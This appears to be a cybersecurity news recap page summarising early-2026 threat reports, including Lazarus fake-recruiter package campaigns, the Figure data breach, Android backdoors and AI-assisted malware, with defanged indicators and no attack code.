Daily Recap, Android and AI malware like PromptSpy are using Gemini at runtime to control UI actions, deploy a VNC module, steal unlock credentials, and prevent uninstallation. Infostealers are becoming key entry points linked to Bitter APT, Volt Typhoon remains embedded in US utilities, and ransomware incidents target Advantest and tribal services, highlighting ongoing risks to critical infrastructure and government services. #PromptSpy #VoltTyphoon
Tag: BLOCKCHAIN
Proofpoint identified a new malware-as-a-service (MaaS) called TrustConnect that masqueraded as a legitimate remote monitoring and management (RMM) tool, used an EV code signing certificate to sign branded installers, and provided a web-based C2/dashboard with automated payload generation and a $300/month subscription model. Proofpoint disrupted the TrustConnect infrastructure (C2 domain trustconnectsoftware[.]com…
Nearly 1 million user records were exposed in a breach at blockchain-powered lender Figure Technology Solutions after an employee fell victim to a social engineering attack. The ShinyHunters group claimed responsibility and published more than 2.4GB of stolen files, with Have I Been Pwned identifying roughly 967,000 affected Figure records, including…
Hackers stole personal and contact information from nearly 1 million accounts after breaching Figure Technology Solutions in a social engineering attack, with Have I Been Pwned reporting data from 967,200 accounts dating to January 2026. Extortion group ShinyHunters claimed responsibility and posted roughly 2.5GB of stolen loan applicant data, and the incident is linked to broader vishing campaigns targeting SSO providers and multiple high‑profile organizations. #Figure #ShinyHunters
Researchers at Kaspersky have analyzed Keenadu, an Android backdoor found preinstalled in device firmware or delivered via OTA updates and malicious apps, which gives operators full remote control and is primarily used for ad fraud. Kaspersky detected roughly 13,000 infections across countries including Russia, Japan, Germany, Brazil, and the Netherlands, and…
ReversingLabs uncovered a modular fake recruitment campaign named graphalgo that uses deceptive blockchain job tasks to distribute malicious npm and PyPI packages to JavaScript and Python developers. The operation, attributed to the North Korea-linked Lazarus Group, deploys fake companies like Veltrix Capital, staged interview repositories, and delayed malicious package updates that…
Figure confirmed a data breach after an employee fell for a social engineering attack that allowed hackers to steal a limited number of files. ShinyHunters claimed responsibility and released about 2.5GB of stolen data while Figure notifies affected individuals and offers free credit monitoring. #Figure #ShinyHunters…
Microsoft disclosed a new ClickFix variant that tricks users into running nslookup via the Windows Run dialog and cmd.exe to perform DNS-based staging and fetch a second-stage payload. The chain downloads a ZIP from azwsappdev[.]com that leads to a Python script, VBScript and ModeloRAT persistence, while related campaigns use CastleLoader, Lumma…
The notorious North Korean Lazarus Group has launched “Graphalgo,” a sophisticated fake-recruiter campaign targeting Python and JavaScript developers in the cryptocurrency sector by luring them with lucrative job offers. The operation uses a modular, multi-stage infection chain that hides malicious payloads in open-source packages—most notably the npm package bigmathutils—and leverages public…
A new variation of a fake recruiter campaign attributed to North Korea’s Lazarus group targets JavaScript and Python developers with cryptocurrency-related coding tasks that trick applicants into running malicious repositories. Researchers uncovered 192 malicious npm and PyPI packages dubbed “Graphalgo” that deliver a modular RAT capable of MetaMask theft, token‑protected C2, remote command execution, and data exfiltration; impacted developers should rotate credentials and reinstall their OS. #Graphalgo #Lazarus
ReversingLabs uncovered a modular software‑supply‑chain campaign called graphalgo, attributed to North Korea’s Lazarus Group, that targets JavaScript and Python developers via fake recruiter job tasks and malicious packages on npm and PyPI. The operation uses fake company personas (e.g., Veltrix Capital), social outreach (LinkedIn, Facebook, Reddit), dependency-based infection (packages such as bigmathutils and graphnetworkx), and multistage downloaders that deploy a token‑protected RAT communicating with codepool[.]cloud. #LazarusGroup #graphalgo
Cybersecurity startup Outtake raised $40 million in a Series B led by ICONIQ to build a unified platform that preserves digital trust against surging AI-driven phishing and impersonation attacks. The platform uses agentic AI and OSINT scanning to detect references to critical assets across text, images, video, and audio while offering…
![Cybersecurity News | Daily Recap [20 Feb 2026]](https://www.hendryadrian.com/tweet/image/DailyRecap.png "Cybersecurity News | Daily Recap [20 Feb 2026]")
Daily Recap, exposed test credentials in a public S3 bucket allowed an attacker to gain full admin control of an AWS environment in 8 minutes via Lambda code injection and privilege escalation, while Google Looker vulnerabilities enabled RCE and data exfiltration in cloud instances and self-hosted deployments. The recap also covers the Harvard Alumni data breach tied to ShinyHunters, the Panera data exposure, the Incognito Market operator’s 30-year sentence, rising ransomware activity from Qilin and CL0P, and notable nation-state and cyberespionage campaigns like Lotus Blossom and Amaranth Dragon. #ShinyHunters #HarvardAlumni #PaneraBread #IncognitoMarket #Qilin #CL0P #LotusBlossom #AmaranthDragon #TRMLabs #AWS #Looker
Nullify raised $12.5 million in a seed round led by SYN Ventures, bringing total funding to $16.9 million to scale go-to-market, engineering and research teams, and expand internationally. Nullify’s AI-based autonomous workforce for vulnerability management integrates with codebases, cloud environments, ticketing systems and a long-term memory called Vault to detect, triage,…
Rui-Siang Lin, operating as “Pharaoh,” ran Incognito Market into a $105+ million darknet narcotics enterprise that facilitated hundreds of thousands of transactions and sold fentanyl-laced pills linked to at least one reported death. In March 2024 Lin was sentenced to 30 years, signaling that industrial-scale dark web marketplaces and their operators…